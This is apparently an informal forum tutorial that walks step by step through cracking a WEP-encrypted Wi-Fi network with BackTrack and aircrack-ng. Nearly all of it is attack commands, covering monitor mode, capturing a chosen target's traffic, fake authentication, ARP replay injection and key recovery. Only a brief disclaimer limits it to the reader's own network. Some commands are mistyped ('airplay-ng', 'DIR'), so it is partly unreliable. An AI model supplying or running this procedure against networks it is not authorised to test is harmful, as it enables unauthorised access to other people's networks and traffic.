-------------------------------------------------------------------------------------------------------
! NOTE !
This is only for testing the security of your own network. I shall not be responsible for misuse of it...Do not use it on others as it is illegal..
------------------------------------------------------------------------------
OK. now lets begin im going to make it simple by dividing it into steps..
- Goto www.backtrack-linux.org
- download back track ISO image
- Burn it to a CD via ISO image burner (www.imgburn.com)
- Now restart your PC with the CD
- When it will pop up for login type startx
- open a new shell console
- type /etc/init.d/networking start
- now type airmon-ng
- airmon-ng stop [your wireless card name]
- airmon-ng start [wireless card name]
- airmon-ng
- airodump-ng [wireless card name]
- now note the target's channel number , bssid , essid
- now press ctrl c to stop
- airodump-ng -w wep -c [channel number] --bssid [bssid number] [wireless card name]
- now open a new console and type
- aireplay-ng -1 0 -a [bssid] [wireless card name]
- Now open third console
- type
- airplay-ng -3 -b [bssid][wireless card name]
- now open the console where info was sending and receiving data
- Run until data>30,000
- press ctrl c
- after this type DIR
- aircrack-ng [filename].cap
- WOW YOU GOT YOUR JOB DONE...